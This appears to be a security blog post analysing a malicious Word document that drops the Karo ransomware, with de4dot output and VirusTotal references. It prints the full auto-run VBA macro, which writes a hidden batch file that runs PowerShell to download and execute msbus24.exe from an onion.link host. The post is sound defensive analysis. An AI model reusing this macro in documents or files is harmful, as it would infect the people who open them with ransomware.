An analysis of a malicious Word document found using VirusTotal Intelligence!
Well, first things first, the damn document has been password protected. Getting around that was a bit of a headache, but worth it. Anyway.
This is the malicious script which was hiding behind the password
Private Sub Document_Open() Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True) a.WriteLine ("@echo off") a.WriteLine ("set num=0") a.WriteLine (":checkexist") a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (") a.WriteLine (UserForm1.Label1.Caption) a.WriteLine ("TIMEOUT /t 20 /nobreak") a.WriteLine ("set /a num+=1") a.WriteLine ("GOTO checkexist )") a.WriteLine (":zipexist") a.Close Shell Environ("temp") + "\test.bat", vbHide End Sub
UserForm1.Label1.Caption
looks like this:
So the ‘completed script’ looks as follows:
Private Sub Document_Open() Set fs = CreateObject("Scripting.FileSystemObject") Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True) a.WriteLine ("@echo off") a.WriteLine ("set num=0") a.WriteLine (":checkexist") a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (") a.WriteLine ("powershell.exe -w hidden "(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')" & %tmp%\msbus24.exe") a.WriteLine ("TIMEOUT /t 20 /nobreak") a.WriteLine ("set /a num+=1") a.WriteLine ("GOTO checkexist )") a.WriteLine (":zipexist") a.Close Shell Environ("temp") + "\test.bat", vbHide End Sub
So the malicious script creates a batch file, which downloads a file from http://fbbkvm7ezghq4dx3.onion.link
and then executes the downloaded file.
Let’s dig into msbus24.exe
. The file is a .NET binary so it’s time to dig out DnSpy!
The file was obfuscated using SmartAssembly – which is nice and easy to deobfuscate thankfully!
$ de4dot msbus24.exe de4dot v3.1.41592.3405 Copyright (C) 2011-2015 [email protected] Latest version and source code: https://github.com/0xd4d/de4dot Detected SmartAssembly 6.8.0.121 (C:\msbus24.exe) Cleaning C:\msbus24.exe Renaming all obfuscated symbols Saving C:\msbus24-cleaned.exe
The entry point is: ns0.Class2.Main
so I’m going to start there.
An initial assumption is that this malware is still in early development, or is it a ‘Malware-as-a-Service’ type of deal because of little things like this: Mutex mutex = new Mutex(false, "MyUniqueMutexName");
The malware has the namespace of: namespace karo
, so this is a strain of ransomware that has already been documented – based on EDA2 🙂
References
VirusTotal
Original Document - https://www.virustotal.com/en/file/efe972d0d2f73fc51813889b756f2660840a4ccf2c783688a31c2eb9e2052b3b/analysis/
msbus24.exe - https://www.virustotal.com/file/48d3a79c6b83b6e45d1f217782ff35c9488d189392798b955cb3a946a650143f/analysis/
Tools
- DnSpy
- De4Dot